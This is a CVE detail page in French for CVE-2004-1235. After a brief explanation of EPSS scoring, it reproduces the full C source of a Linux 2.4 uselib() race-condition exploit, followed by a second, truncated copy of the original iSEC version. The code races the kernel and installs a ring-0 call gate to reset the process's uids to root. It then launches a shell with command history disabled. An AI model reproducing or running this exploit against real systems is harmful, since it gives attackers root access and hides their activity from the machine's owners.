CVE-2004-1235 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

/* * EDB Note: There's is an updated version ~ https://www.exploit-db.com/exploits/895/ */ /* * Linux kernel 2.4 uselib() privilege elevation exploit. * * original exploit source from http://isec.pl * reference: http://isec.pl/vulnerabilities/isec-0021-uselib.txt * * I modified the Paul Starzetz's exploit, made it more possible * to race successfully. The exploit still works only on 2.4 series. * It should be also works on 2.4 SMP, but not easy. * * thx newbug. * * Tim Hsu <timhsu at chroot.org> Jan 2005. * */ #define _GNU_SOURCE #include <stdio.h> #include <stdlib.h> #include <string.h> #include <fcntl.h> #include <unistd.h> #include <errno.h> #include <sched.h> #include <syscall.h> #include <limits.h> #include <sys/types.h> #include <sys/wait.h> #include <sys/time.h> #include <sys/mman.h> #include <sys/sysinfo.h> #include <linux/elf.h> #include <linux/linkage.h> #include <asm/page.h> #include <asm/ldt.h> #include <asm/segment.h> #define str(s) #s #define xstr(s) str(s) #define MREMAP_MAYMOVE 1 // temp lib location #define LIBNAME "/tmp/_elf_lib" // shell name #define SHELL "/bin/bash" // time delta to detect race #define RACEDELTA 5000 // if you have more deadbabes in memory, change this #define MAGIC 0xdeadbabe // do not touch #define SLAB_THRSH 128 #define SLAB_PER_CHLD (INT_MAX - 1) #define LIB_SIZE ( PAGE_SIZE * 4 ) #define STACK_SIZE ( PAGE_SIZE * 4 ) #define LDT_PAGES ( (LDT_ENTRIES*LDT_ENTRY_SIZE+PAGE_SIZE-1)/PAGE_SIZE ) #define ENTRY_GATE ( LDT_ENTRIES-1 ) #define SEL_GATE ( (ENTRY_GATE<<3)|0x07 ) #define ENTRY_LCS ( ENTRY_GATE-2 ) #define SEL_LCS ( (ENTRY_LCS<<3)|0x04 ) #define ENTRY_LDS ( ENTRY_GATE-1 ) #define SEL_LDS ( (ENTRY_LDS<<3)|0x04 ) #define kB * 1024 #define MB * 1024 kB #define GB * 1024 MB #define TMPLEN 256 #define PGD_SIZE ( PAGE_SIZE*1024 ) extern char **environ; static char cstack[STACK_SIZE]; static char name[TMPLEN]; static char line[TMPLEN]; static pid_t consume_pid; static volatile int val = 0, go = 0, finish = 0, scnt = 0, ccnt=0, delta = 0, delta_max = RACEDELTA, map_flags = PROT_WRITE|PROT_READ; static int fstop=0, silent=0, pidx, pnum=0, smp_max=0, smp, wtime=2, cpid, uid, task_size, old_esp, lib_addr, map_count=0, map_base=0, map_addr, addr_min, addr_max, vma_start, vma_end, max_page; static struct timeval tm1, tm2; static char *myenv[] = {"TERM=vt100", "HISTFILE=/dev/null", NULL}; static char hellc0de[] = "\x49\x6e\x74\x65\x6c\x65\x63\x74\x75\x61\x6c\x20\x70\x72\x6f\x70" "\x65\x72\x74\x79\x20\x6f\x66\x20\x49\x68\x61\x51\x75\x65\x52\x00"; static char *pagemap, *libname=LIBNAME, *shellname=SHELL; #define __NR_sys_gettimeofday __NR_gettimeofday #define __NR_sys_sched_yield __NR_sched_yield #define __NR_sys_madvise __NR_madvise #define __NR_sys_uselib __NR_uselib #define __NR_sys_mmap2 __NR_mmap2 #define __NR_sys_munmap __NR_munmap #define __NR_sys_mprotect __NR_mprotect #define __NR_sys_mremap __NR_mremap inline _syscall6(int, sys_mmap2, int, a, int, b, int, c, int, d, int, e, int, f); inline _syscall5(int, sys_mremap, int, a, int, b, int, c, int, d, int, e); inline _syscall3(int, sys_madvise, void*, a, int, b, int, c); inline _syscall3(int, sys_mprotect, int, a, int, b, int, c); inline _syscall3( int, modify_ldt, int, func, void *, ptr, int, bytecount ); inline _syscall2(int, sys_gettimeofday, void*, a, void*, b); inline _syscall2(int, sys_munmap, int, a, int, b); inline _syscall1(int, sys_uselib, char*, l); inline _syscall0(void, sys_sched_yield); int consume_memory() { struct sysinfo info; char *vmem; sysinfo(&info); vmem = malloc(info.freeram); if (vmem == NULL) { perror("malloc"); return -1; } memset(vmem, 0x90, info.freeram); } inline int tmdiff(struct timeval *t1, struct timeval *t2) { int r; r=t2->tv_sec - t1->tv_sec; r*=1000000; r+=t2->tv_usec - t1->tv_usec; return r; } void fatal(const char *message, int critical) { int sig = critical? SIGSTOP : (fstop? SIGSTOP : SIGKILL); if(!errno) { fprintf(stdout, "\n[-] FAILED: %s ", message); } else { fprintf(stdout, "\n[-] FAILED: %s (%s) ", message, (char*) (strerror(errno)) ); } if(critical) printf("\nCRITICAL, entering endless loop"); printf("\n"); fflush(stdout); unlink(libname); kill(cpid, SIGKILL); for(;;) kill(0, sig); } // try to race do_brk sleeping on kmalloc, may need modification for SMP int raceme(void* v) { finish=1; for(;;) { errno = 0; // check if raced: recheck: if(!go) sys_sched_yield(); sys_gettimeofday(&tm2, NULL); delta = tmdiff(&tm1, &tm2); if(!smp_max && delta < (unsigned)delta_max) goto recheck; smp = smp_max; // check if lib VMAs exist as expected under race condition recheck2: val = sys_madvise((void*) lib_addr, PAGE_SIZE, MADV_NORMAL); if(val) continue; errno = 0; val = sys_madvise((void*) (lib_addr+PAGE_SIZE), LIB_SIZE-PAGE_SIZE, MADV_NORMAL); if( !val || (val<0 && errno!=ENOMEM) ) continue; // SMP? smp--; if(smp>=0) goto recheck2; // recheck race if(!go) continue; finish++; // we need to free one vm_area_struct for mmap to work val = sys_mprotect(map_addr, PAGE_SIZE, map_flags); if(val) fatal("mprotect", 0); val = sys_mmap2(lib_addr + PAGE_SIZE, PAGE_SIZE*3, PROT_NONE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0); if(-1==val) fatal("mmap2 race", 0); printf("\n[+] race won maps=%d", map_count); fflush(stdout); kill(consume_pid, SIGKILL); _exit(0); } return 0; } int callme_1() { return val++; } inline int valid_ptr(unsigned ptr) { return ptr>=task_size && ptr<addr_min-16; } inline int validate_vma(unsigned *p, unsigned s, unsigned e) { unsigned *t; if(valid_ptr(p[0]) && valid_ptr(p[3]) && p[1]==s && p[2]==e) { t=(unsigned*)p[3]; if( t[0]==p[0] && t[1]<=task_size && t[2]<=task_size ) return 1; } return 0; } asmlinkage void kernel_code(unsigned *task) { unsigned *addr = task; // find & reset uids while(addr[0] != uid || addr[1] != uid || addr[2] != uid || addr[3] != uid) addr++; addr[0] = addr[1] = addr[2] = addr[3] = 0; addr[4] = addr[5] = addr[6] = addr[7] = 0; // find & correct VMA for(addr=(unsigned *)task_size; (unsigned)addr<addr_min-16; addr++) { if( validate_vma(addr, vma_start, vma_end) ) { addr[1] = task_size - PAGE_SIZE; addr[2] = task_size; break; } } } void kcode(void); // CPL0 code mostly stolen from cliph void __kcode(void) { asm( "kcode: \n" " pusha \n" " pushl %es \n" " pushl %ds \n" " movl $(" xstr(SEL_LDS) ") ,%edx \n" " movl %edx,%es \n" " movl %edx,%ds \n" " movl $0xffffe000,%eax \n" " andl %esp,%eax \n" " pushl %eax \n" " call kernel_code \n" " addl $4, %esp \n" " popl %ds \n" " popl %es \n" " popa \n" " lret \n" ); } int callme_2() { return val + task_size + addr_min; } void sigfailed(int v) { ccnt++; fatal("lcall", 1); } // modify LDT & exec void try_to_exploit(unsigned addr) { volatile int r, *v; printf("\n[!] try to exploit 0x%.8x", addr); fflush(stdout); unlink(libname); r = sys_mprotect(addr, PAGE_SIZE, PROT_READ|PROT_WRITE|map_flags); if(r) fatal("mprotect 1", 1); // check if really LDT v = (void*) (addr + (ENTRY_GATE*LDT_ENTRY_SIZE % PAGE_SIZE) ); signal(SIGSEGV, sigfailed); r = *v; if(r != MAGIC) { printf("\n[-] FAILED val = 0x%.8x", r); fflush(stdout); fatal("find LDT", 1); } // yeah, setup CPL0 gate v[0] = ((unsigned)(SEL_LCS)<<16) | ((unsigned)kcode & 0xffffU); v[1] = ((unsigned)kcode & ~0xffffU) | 0xec00U; printf("\n[+] gate modified ( 0x%.8x 0x%.8x )", v[0], v[1]); fflush(stdout); // setup CPL0 segment descriptors (we need the 'accessed' versions ;-) v = (void*) (addr + (ENTRY_LCS*LDT_ENTRY_SIZE % PAGE_SIZE) ); v[0] = 0x0000ffff; /* kernel 4GB code at 0x00000000 */ v[1] = 0x00cf9b00; v = (void*) (addr + (ENTRY_LDS*LDT_ENTRY_SIZE % PAGE_SIZE) ); v[0] = 0x0000ffff; /* kernel 4GB data at 0x00000000 */ v[1] = 0x00cf9300; // reprotect to get only one big VMA r = sys_mprotect(addr, PAGE_SIZE, PROT_READ|map_flags); if(r) fatal("mprotect 2", 1); // CPL0 transition sys_sched_yield(); val = callme_1() + callme_2(); asm("lcall $" xstr(SEL_GATE) ",$0x0"); //if( getuid()==0 || (val==31337 && strlen(hellc0de)==31337) ) { if (getuid()==0) { printf("\n[+] exploited, uid=0\n\n" ); fflush(stdout); } else { printf("\n[-] uid change failed" ); fflush(stdout); sigfailed(0); } signal(SIGTERM, SIG_IGN); kill(0, SIGTERM); setresuid(0, 0, 0); execl(shellname, "sh", NULL); fatal("execl", 0); } void scan_mm_finish(); void scan_mm_start(); // kernel page table scan code void scan_mm() { map_addr -= PAGE_SIZE; if(map_addr <= (unsigned)addr_min) scan_mm_start(); scnt=0; val = *(int*)map_addr; scan_mm_finish(); } void scan_mm_finish() { retry: __asm__("movl %0, %%esp" : :"m"(old_esp) ); if(scnt) { pagemap[pidx] ^= 1; } else { sys_madvise((void*)map_addr, PAGE_SIZE, MADV_DONTNEED); } pidx--; scan_mm(); goto retry; } // make kernel page maps before and after allocating LDT void scan_mm_start() { static int npg=0; static struct modify_ldt_ldt_s l; //static struct user_desc l; pnum++; if(pnum==1) { pidx = max_page-1; } else if(pnum==2) { memset(&l, 0, sizeof(l)); l.entry_number = LDT_ENTRIES-1; l.seg_32bit = 1; l.base_addr = MAGIC >> 16; l.limit = MAGIC & 0xffff; l.limit_in_pages = 1; if( modify_ldt(1, &l, sizeof(l)) != 0 ) fatal("modify_ldt", 1); pidx = max_page-1; } else if(pnum==3) { npg=0; for(pidx=0; pidx<=max_page-1; pidx++) { if(pagemap[pidx]) { npg++; } else if(npg == LDT_PAGES) { npg=0; try_to_exploit(addr_min+(pidx-1)*PAGE_SIZE); } else { npg=0; } } fatal("find LDT", 1); } // save context & scan page table __asm__("movl %%esp, %0" : :"m"(old_esp) ); map_addr = addr_max; scan_mm(); } // return number of available SLAB objects in cache int get_slab_objs(const char *sn) { static int c, d, u = 0, a = 0; FILE *fp=NULL; char x1[20]; fp = fopen("/proc/slabinfo", "r"); if(!fp) fatal("get_slab_objs: fopen", 0); fgets(name, sizeof(name) - 1, fp); do { c = u = a = -1; if (!fgets(line, sizeof(line) - 1, fp)) break; c = sscanf(line, "%s %u %u %u %u %u %u", name, &u, &a, &d, &d, &d, &d); } while (strcmp(name, sn)); close(fileno(fp)); fclose(fp); return c == 7 ? a - u : -1; } long memmaped_size = 0; // leave one object in the SLAB inline void prepare_slab() { int *r; map_addr -= PAGE_SIZE; map_count++; map_flags ^= PROT_READ; r = (void*)sys_mmap2((unsigned)map_addr, PAGE_SIZE, map_flags, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0); if(MAP_FAILED == r) { printf("--> prepare_slab(), %dMb\n", memmaped_size/1024/1024); fatal("try again", 0); } memmaped_size += PAGE_SIZE; *r = map_addr; } // sig handlers void segvcnt(int v) { scnt++; scan_mm_finish(); } // child reap void reaper(int v) { ccnt++; waitpid(0, &v, WNOHANG|WUNTRACED); } // sometimes I get the VMAs in reversed order... // so just use anyone of the two but take care about the flags void check_vma_flags(); void vreversed(int v) { map_flags = 0; check_vma_flags(); } void check_vma_flags() { if(map_flags) { __asm__("movl %%esp, %0" : :"m"(old_esp) ); } else { __asm__("movl %0, %%esp" : :"m"(old_esp) ); goto out; } signal(SIGSEGV, vreversed); val = * (unsigned*)(lib_addr + PAGE_SIZE); out: } // use elf library and try to sleep on kmalloc void exploitme() { int r, sz, pcnt=0; static char smiley[]="-\\|/-\\|/"; // printf("\n cat /proc/%d/maps", getpid() ); fflush(stdout); // helper clone finish=0; ccnt=0; sz = sizeof(cstack) / sizeof(cstack[0]); cpid = clone(&raceme, (void*) &cstack[sz-16], CLONE_VM|CLONE_SIGHAND|CLONE_FS|SIGCHLD, NULL ); if(-1==cpid) fatal("clone", 0); // synchronize threads while(!finish) sys_sched_yield(); finish=0; if(!silent) { printf("\n"); fflush(stdout); } // try to hit the kmalloc race for(;;) { r = get_slab_objs("vm_area_struct"); //printf("\nfree slab = %d\n",r); while(r != 1 && r > 0) { prepare_slab(); r--; } sys_gettimeofday(&tm1, NULL); go = 1; r=sys_uselib(libname); go = 0; if(r) fatal("uselib", 0); if(finish) break; // wipe lib VMAs and try again r = sys_munmap(lib_addr, LIB_SIZE); if(r) fatal("munmap lib", 0); if(ccnt) goto failed; if( !silent && !(pcnt%64) ) { printf("\r Wait... %c", smiley[ (pcnt/64)%8 ]); fflush(stdout); } pcnt++; } // seems we raced, free mem r = sys_munmap(map_addr, map_base-map_addr + PAGE_SIZE); if(r) fatal("munmap 1", 0); r = sys_munmap(lib_addr, PAGE_SIZE); if(r) fatal("munmap 2", 0); // relax kswapd sys_gettimeofday(&tm1, NULL); for(;;) { sys_sched_yield(); sys_gettimeofday(&tm2, NULL); delta = tmdiff(&tm1, &tm2); if( wtime*1000000U <= (unsigned)delta ) break; } // we need to check the PROT_EXEC flag map_flags = PROT_EXEC; check_vma_flags(); if(!map_flags) { printf("\n VMAs reversed"); fflush(stdout); } // write protect brk's VMA to fool vm_enough_memory() r = sys_mprotect((lib_addr + PAGE_SIZE), LIB_SIZE-PAGE_SIZE, PROT_READ|map_flags); if(-1==r) { fatal("mprotect brk", 0); } // this will finally make the big VMA... sz = (0-lib_addr) - LIB_SIZE - PAGE_SIZE; expand: r = sys_madvise((void*)(lib_addr + PAGE_SIZE), LIB_SIZE-PAGE_SIZE, MADV_NORMAL); if(r) fatal("madvise", 0); r = sys_mremap(lib_addr + LIB_SIZE-PAGE_SIZE, PAGE_SIZE, sz, MREMAP_MAYMOVE, 0); if(-1==r) { if(0==sz) { fatal("mremap: expand VMA", 0); } else { sz -= PAGE_SIZE; goto expand; } } vma_start = lib_addr + PAGE_SIZE; vma_end = vma_start + sz + 2*PAGE_SIZE; printf("\n expanded VMA (0x%.8x-0x%.8x)", vma_start, vma_end); fflush(stdout); // try to figure kernel layout signal(SIGCHLD, reaper); signal(SIGSEGV, segvcnt); signal(SIGBUS, segvcnt); scan_mm_start(); failed: printf("failed:\n"); fatal("try again", 0); } // make fake ELF library void make_lib() { struct elfhdr eh; struct elf_phdr eph; static char tmpbuf[PAGE_SIZE]; int fd; // make our elf library umask(022); unlink(libname); fd=open(libname, O_RDWR|O_CREAT|O_TRUNC, 0755); if(fd<0) fatal("open lib ("LIBNAME" not writable?)", 0); memset(&eh, 0, sizeof(eh) ); // elf exec header memcpy(eh.e_ident, ELFMAG, SELFMAG); eh.e_type = ET_EXEC; eh.e_machine = EM_386; eh.e_phentsize = sizeof(struct elf_phdr); eh.e_phnum = 1; eh.e_phoff = sizeof(eh); write(fd, &eh, sizeof(eh) ); // section header: memset(&eph, 0, sizeof(eph) ); eph.p_type = PT_LOAD; eph.p_offset = 4096; eph.p_filesz = 4096; eph.p_vaddr = lib_addr; eph.p_memsz = LIB_SIZE; eph.p_flags = PF_W|PF_R|PF_X; write(fd, &eph, sizeof(eph) ); // execable code lseek(fd, 4096, SEEK_SET); memset(tmpbuf, 0x90, sizeof(tmpbuf) ); write(fd, &tmpbuf, sizeof(tmpbuf) ); close(fd); } // move stack down #2 void prepare_finish() { int r; static struct sysinfo si; old_esp &= ~(PAGE_SIZE-1); old_esp -= PAGE_SIZE; task_size = ((unsigned)old_esp + 1 GB ) / (1 GB) * 1 GB; r = sys_munmap(old_esp, task_size-old_esp); if(r) fatal("unmap stack", 0); // setup rt env uid = getuid(); lib_addr = task_size - LIB_SIZE - PAGE_SIZE; if(map_base) map_addr = map_base; else map_base = map_addr = (lib_addr - PGD_SIZE) & ~(PGD_SIZE-1); printf("\n[+] moved stack %x, task_size=0x%.8x, map_base=0x%.8x", old_esp, task_size, map_base); fflush(stdout); // check physical mem & prepare sysinfo(&si); addr_min = task_size + si.totalram; addr_min = (addr_min + PGD_SIZE - 1) & ~(PGD_SIZE-1); addr_max = addr_min + si.totalram; if((unsigned)addr_max >= 0xffffe000 || (unsigned)addr_max < (unsigned)addr_min) addr_max = 0xffffd000; printf("\n[+] vmalloc area 0x%.8x - 0x%.8x", addr_min, addr_max); max_page = (addr_max - addr_min) / PAGE_SIZE; pagemap = malloc( max_page + 32 ); if(!pagemap) fatal("malloc pagemap", 1); memset(pagemap, 0, max_page + 32); // go go make_lib(); exploitme(); } // move stack down #1 void prepare() { unsigned p=0; environ = myenv; p = sys_mmap2( 0, STACK_SIZE, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0 ); if(-1==p) fatal("mmap2 stack", 0); p += STACK_SIZE - 64; __asm__("movl %%esp, %0 \n" "movl %1, %%esp \n" : : "m"(old_esp), "m"(p) ); prepare_finish(); } void chldcnt(int v) { ccnt++; } // alloc slab objects... inline void do_wipe() { int *r, c=0, left=0; __asm__("movl %%esp, %0" : : "m"(old_esp) ); old_esp = (old_esp - PGD_SIZE+1) & ~(PGD_SIZE-1); old_esp = map_base? map_base : old_esp; for(;;) { if(left<=0) left = get_slab_objs("vm_area_struct"); if(left <= SLAB_THRSH) break; left--; map_flags ^= PROT_READ; old_esp -= PAGE_SIZE; r = (void*)sys_mmap2(old_esp, PAGE_SIZE, map_flags, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0 ); if(MAP_FAILED == r) break; if(c>SLAB_PER_CHLD) break; if( (c%1024)==0 ) { if(!c) printf("\n"); printf("\r child %d VMAs %d", val, c); fflush(stdout); } c++; } printf("\r child %d VMAs %d", val, c); fflush(stdout); kill(getppid(), SIGUSR1); for(;;) pause(); } // empty SLAB caches void wipe_slab() { signal(SIGUSR1, chldcnt); printf("\n[+] SLAB cleanup"); fflush(stdout); for(;;) { ccnt=0; val++; cpid = fork(); if(!cpid) do_wipe(); while(!ccnt) sys_sched_yield(); if( get_slab_objs("vm_area_struct") <= SLAB_THRSH ) break; } signal(SIGUSR1, SIG_DFL); } void usage(char *n) { printf("\nUsage: %s\t-f forced stop\n", n); printf("\t\t-s silent mode\n"); printf("\t\t-c command to run\n"); printf("\t\t-n SMP iterations\n"); printf("\t\t-d race delta us\n"); printf("\t\t-w wait time seconds\n"); printf("\t\t-l alternate lib name\n"); printf("\t\t-a alternate addr hex\n"); printf("\n"); _exit(1); } // give -s for forced stop, -b to clean SLAB int main(int ac, char **av) { int r; while(ac) { r = getopt(ac, av, "n:l:a:w:c:d:fsh"); if(r<0) break; switch(r) { case 'f' : fstop = 1; break; case 's' : silent = 1; break; case 'n' : smp_max = atoi(optarg); break; case 'd': if(1!=sscanf(optarg, "%u", &delta_max) || delta_max > 100000u ) fatal("bad delta value", 0); break; case 'w' : wtime = atoi(optarg); if(wtime<0) fatal("bad wait value", 0); break; case 'l' : libname = strdup(optarg); break; case 'c' : shellname = strdup(optarg); break; case 'a' : if(1!=sscanf(optarg, "%x", &map_base)) fatal("bad addr value", 0); map_base &= ~(PGD_SIZE-1); break; case 'h' : default: usage(av[0]); break; } } consume_pid = fork(); if (consume_pid == 0) { consume_memory(); pause(); return 0; } // basic setup uid = getuid(); setpgrp(); wipe_slab(); prepare(); return 0; } // milw0rm.com [2005-01-27]

/* * EDB Note: There's is an updated version ~ https://www.exploit-db.com/exploits/895/ */ /* * binfmt_elf uselib VMA insert race vulnerability * v1.08 * * gcc -O2 -fomit-frame-pointer elflbl.c -o elflbl * * Copyright (c) 2004 iSEC Security Research. All Rights Reserved. * * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS" * AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION * WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED. * */ #define _GNU_SOURCE #include <stdio.h> #include <stdlib.h> #include <string.h> #include <fcntl.h> #include <unistd.h> #include <errno.h> #include <sched.h> #include <syscall.h> #include <limits.h> #include <sys/types.h> #include <sys/wait.h> #include <sys/time.h> #include <sys/mman.h> #include <sys/sysinfo.h> #include <linux/elf.h> #include <linux/linkage.h> #include <asm/page.h> #include <asm/ldt.h> #include <asm/segment.h> #define str(s) #s #define xstr(s) str(s) #define MREMAP_MAYMOVE 1 // temp lib location #define LIBNAME "/dev/shm/_elf_lib" // shell name #define SHELL "/bin/bash" // time delta to detect race #define RACEDELTA 5000 // if you have more deadbabes in memory, change this #define MAGIC 0xdeadbabe // do not touch #define SLAB_THRSH 128 #define SLAB_PER_CHLD (INT_MAX - 1) #define LIB_SIZE ( PAGE_SIZE * 4 ) #define STACK_SIZE ( PAGE_SIZE * 4 ) #define LDT_PAGES ( (LDT_ENTRIES*LDT_ENTRY_SIZE+PAGE_SIZE-1)/PAGE_SIZE ) #define ENTRY_GATE ( LDT_ENTRIES-1 ) #define SEL_GATE ( (ENTRY_GATE<<3)|0x07 ) #define ENTRY_LCS ( ENTRY_GATE-2 ) #define SEL_LCS ( (ENTRY_LCS<<3)|0x04 ) #define ENTRY_LDS ( ENTRY_GATE-1 ) #define SEL_LDS ( (ENTRY_LDS<<3)|0x04 ) #define kB * 1024 #define MB * 1024 kB #define GB * 1024 MB #define TMPLEN 256 #define PGD_SIZE ( PAGE_SIZE*1024 ) extern char **environ; static char cstack[STACK_SIZE]; static char name[TMPLEN]; static char line[TMPLEN]; static volatile int val = 0, go = 0, finish = 0, scnt = 0, ccnt=0, delta = 0, delta_max = RACEDELTA, map_flags = PROT_WRITE|PROT_READ; static int fstop=0, silent=0, pidx, pnum=0, smp_max=0, smp, wtime=2, cpid, uid, task_size, old_esp, lib_addr, map_count=0, map_base=0, map_addr, addr_min, addr_max, vma_start, vma_end, max_page; static struct timeval tm1, tm2; static char *myenv[] = {"TERM=vt100", "HISTFILE=/dev/null", NULL}; static char hellc0de[] = "\x49\x6e\x74\x65\x6c\x65\x63\x74\x75\x61\x6c\x20\x70\x72\x6f\x70" "\x65\x72\x74\x79\x20\x6f\x66\x20\x49\x68\x61\x51\x75\x65\x52\x00"; static char *pagemap, *libname=LIBNAME, *shellname=SHELL; #define __NR_sys_gettimeofday __NR_gettimeofday #define __NR_sys_sched_yield __NR_sched_yield #define __NR_sys_madvise __NR_madvise #define __NR_sys_uselib __NR_uselib #define __NR_sys_mmap2 __NR_mmap2 #define __NR_sys_munmap __NR_munmap #define __NR_sys_mprotect __NR_mprotect #define __NR_sys_mremap __NR_mremap inline _syscall6(int, sys_mmap2, int, a, int, b, int, c, int, d, int, e, int, f); inline _syscall5(int, sys_mremap, int, a, int, b, int, c, int, d, int, e); inline _syscall3(int, sys_madvise, void*, a, int, b, int, c); inline _syscall3(int, sys_mprotect, int, a, int, b, int, c); inline _syscall3( int, modify_ldt, int, func, void *, ptr, int, bytecount ); inline _syscall2(int, sys_gettimeofday, void*, a, void*, b); inline _syscall2(int, sys_munmap, int, a, int, b); inline _syscall1(int, sys_uselib, char*, l); inline _syscall0(void, sys_sched_yield); inline int tmdiff(struct timeval *t1, struct timeval *t2) { int r; r=t2->tv_sec - t1->tv_sec; r*=1000000; r+=t2->tv_usec - t1->tv_usec; return r; } void fatal(const char *message, int critical) { int sig = critical? SIGSTOP : (fstop? SIGSTOP : SIGKILL); if(!errno) { fprintf(stdout, "\n[-] FAILED: %s ", message); } else { fprintf(stdout, "\n[-] FAILED: %s (%s) ", message, (char*) (strerror(errno)) ); } if(critical) printf("\nCRITICAL, entering endless loop"); printf("\n"); fflush(stdout); unlink(libname); kill(cpid, SIGKILL); for(;;) kill(0, sig); } // try to race do_brk sleeping on kmalloc, may need modification for SMP int raceme(void* v) { finish=1; for(;;) { errno = 0; // check if raced: recheck: if(!go) sys_sched_yield(); sys_gettimeofday(&tm2, NULL); delta = tmdiff(&tm1, &tm2); if(!smp_max && delta < (unsigned)delta_max) goto recheck; smp = smp_max; // check if lib VMAs exist as expected under race condition recheck2: val = sys_madvise((void*) lib_addr, PAGE_SIZE, MADV_NORMAL); if(val) continue; errno = 0; val = sys_madvise((void*) (lib_addr+PAGE_SIZE), LIB_SIZE-PAGE_SIZE, MADV_NORMAL); if( !val || (val<0 && errno!=ENOMEM) ) continue; // SMP? smp--; if(smp>=0) goto recheck2; // recheck race if(!go) continue; finish++; // we need to free one vm_area_struct for mmap to work val = sys_mprotect(map_addr, PAGE_SIZE, map_flags); if(val) fatal("mprotect", 0); val = sys_mmap2(lib_addr + PAGE_SIZE, PAGE_SIZE*3, PROT_NONE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0); if(-1==val) fatal("mmap2 race", 0); printf("\n[+] race won maps=%d", map_count); fflush(stdout); _exit(0); } return 0; } int callme_1() { return val++; } inline int valid_ptr(unsigned ptr) { return ptr>=task_size && ptr<addr_min-16; } inline int validate_vma(unsigned *p, unsigned s, unsigned e) { unsigned *t; if(valid_ptr(p[0]) && valid_ptr(p[3]) && p[1]==s && p[2]==e) { t=(unsigned*)p[3]; if( t[0]==p[0] && t[1]<=task_size && t[2]<=task_size ) return 1; } return 0; } asmlinkage void kernel_code(unsigned *task) { unsigned *addr = task; // find & reset uids while(addr[0] != uid || addr[1] != uid || addr[2] != uid || addr[3] != uid) addr++; addr[0] = addr[0] = addr[2] = addr[3] = 0; addr[4] = addr[5] = addr[6] = addr[7] = 0; // find & correct VMA for(addr=(unsigned *)task_size; (unsigned)addr<addr_min-16; addr++) { if( validate_vma(addr, vma_start, vma_end) ) { addr[1] = task_size - PAGE_SIZE; addr[2] = task_size; break; } } } void kcode(void); void __kcode(void) { asm( "kcode: \n" " pusha \n" " pushl %es \n" " pushl %ds \n" " movl $(" xstr(SEL_LDS) ") ,%edx \n" " movl %edx,%es \n" " movl %edx,%ds \n" " movl $0xffffe000,%eax \n" " andl %esp,%eax \n" " pushl %eax \n" " call kernel_code \n" " addl $4, %esp \n" " popl %ds \n" " popl %es \n" " popa \n" " lret \n" ); } int callme_2() { return val + task_size + addr_min; } void sigfailed(int v) { ccnt++; fatal("lcall", 1); } // modify LDT & exec void try_to_exploit(unsigned addr) { volatile int r, *v; printf("\n[!] try to exploit 0x%.8x", addr); fflush(stdout); unlink(libname); r = sys_mprotect(addr, PAGE_SIZE, PROT_READ|PROT_WRITE|map_flags); if(r) fatal("mprotect 1", 1); // check if really LDT v = (void*) (addr + (ENTRY_GATE*LDT_ENTRY_SIZE % PAGE_SIZE) ); signal(SIGSEGV, sigfailed); r = *v; if(r != MAGIC) { printf("\n[-] FAILED val = 0x%.8x", r); fflush(stdout); fatal("find LDT", 1); } // yeah, setup CPL0 gate v[0] = ((unsigned)(SEL_LCS)<<16) | ((unsigned)kcode & 0xffffU); v[1] = ((unsigned)kcode & ~0xffffU) | 0xec00U; printf("\n[+] gate modified ( 0x%.8x 0x%.8x )", v[0], v[1]); fflush(stdout); // setup CPL0 segment descriptors (we need the 'accessed' versions ;-) v = (void*) (addr + (ENTRY_LCS*LDT_ENTRY_SIZE % PAGE_SIZE) ); v[0] = 0x0000ffff; /* kernel 4GB code at 0x00000000 */ v[1] = 0x00cf9b00; v = (void*) (addr + (ENTRY_LDS*LDT_ENTRY_SIZE % PAGE_SIZE) ); v[0] = 0x0000ffff; /* kernel 4GB data at 0x00000000 */ v[1] = 0x00cf9300; // reprotect to get only one big VMA r = sys_mprotect(addr, PAGE_SIZE, PROT_READ|map_flags); if(r) fatal("mprotect 2", 1); // CPL0 transition sys_sched_yield(); val = callme_1() + callme_2(); asm("lcall $" xstr(SEL_GATE) ",$0x0"); if( getuid()==0 || (val==31337 && strlen(hellc0de)==16) ) { printf("\n[+] exploited, uid=0\n\n" ); fflush(stdout); } else { printf("\n[-] uid change failed" ); fflush(stdout); sigfailed(0); } signal(SIGTERM, SIG_IGN); kill(0, SIGTERM); execl(shellname, "sh", NULL); fatal("execl", 0); } void scan_mm_finish(); void scan_mm_start(); // kernel page table scan code void scan_mm() { map_addr -= PAGE_SIZE; if(map_addr <= (unsigned)addr_min) scan_mm_start(); scnt=0; val = *(int*)map_addr; scan_mm_finish(); } void scan_mm_finish() { retry: __asm__("movl %0, %%esp" : :"m"(old_esp) ); if(scnt) { pagemap[pidx] ^= 1; } else { sys_madvise((void*)map_addr, PAGE_SIZE, MADV_DONTNEED); } pidx--; scan_mm(); goto retry; } // make kernel page maps before and after allocating LDT void scan_mm_start() { static int npg=0; static struct modify_ldt_ldt_s l; pnum++; if(pnum==1) { pidx = max_page-1; } else if(pnum==2) { memset(&l, 0, sizeof(l)); l.entry_number = LDT_ENTRIES-1; l.seg_32bit = 1; l.base_addr = MAGIC >> 16; l.limit = MAGIC & 0xffff; l.limit_in_pages = 1; if( modify_ldt(1, &l, sizeof(l)) != 0 ) fatal("modify_ldt", 1); pidx = max_page-1; } else if(pnum==3) { npg=0; for(pidx=0; pidx<=max_page-1; pidx++) { if(pagemap[pidx]) { npg++; fflush(stdout); } else if(npg == LDT_PAGES) { npg=0; try_to_exploit(addr_min+(pidx-1)*PAGE_SIZE); } else { npg=0; } } fatal("find LDT", 1); } // save context & scan page table __asm__("movl %%esp, %0" : :"m"(old_esp) ); map_addr = addr_max; scan_mm(); } // return number of available SLAB objects in cache int get_slab_objs(const char *sn) { static int c, d, u = 0, a = 0; FILE *fp=NULL; 